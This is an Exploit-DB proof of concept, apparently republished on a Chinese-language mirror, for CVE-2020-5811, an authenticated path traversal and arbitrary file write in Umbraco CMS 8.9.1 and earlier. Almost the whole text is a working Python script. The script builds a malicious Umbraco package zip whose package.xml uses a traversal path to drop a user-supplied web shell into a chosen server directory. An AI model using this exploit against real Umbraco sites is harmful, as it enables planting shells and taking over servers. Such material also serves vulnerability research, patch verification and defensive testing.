Umbraco CMS 8.9.1 – Directory Traversal

  • 作者: BitTheByte
    日期: 2021-08-31
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50241/
  • # Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
    # Exploit Author: BitTheByte
    # Description: Authenticated path traversal vulnerability.
    # Exploit Research: https://www.tenable.com/security/research/tra-2020-59
    # Vendor Homepage: https://umbraco.com/
    # Version: <= 8.9.1 
    # CVE : CVE-2020-5811
    
    import string
    import random
    import argparse
    import zipfile
    import os
    
    package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
    <umbPackage>
    <files>
    <file>
    <guid>{{filename}}</guid>
    <orgPath>{{upload_path}}</orgPath>
    <orgName>{{filename}}</orgName>
    </file>
    </files>
    <info>
    <package>
    <name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
    <version>1.0.0</version>
    <iconUrl></iconUrl>
    <license url="http://opensource.org/licenses/MIT">MIT License</license>
    <url>https://example.com</url>
    <requirements>
    <major>0</major>
    <minor>0</minor>
    <patch>0</patch>
    </requirements>
    </package>
    <author>
    <name>CVE-2020-5811</name>
    <website>https://example.com</website>
    </author>
    <contributors>
    <contributor></contributor>
    </contributors>
    <readme><![CDATA[]]></readme>
    </info>
    <DocumentTypes />
    <Templates />
    <Stylesheets />
    <Macros />
    <DictionaryItems />
    <Languages />
    <DataTypes />
    <Actions />
    </umbPackage>
    """
    
    parser = argparse.ArgumentParser(description='CVE-2020-5811')
    parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
    parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
    args = parser.parse_args()
    
    if not os.path.isfile(args.shell):
    print("[ERROR] please use a correct path for the shell file.")
    
    output_file = "exploit.zip"
    
    package = zipfile.ZipFile(output_file, 'w')
    package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
    package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
    package.close()
    
    print(f"[DONE] Created Umbraco package: {output_file}")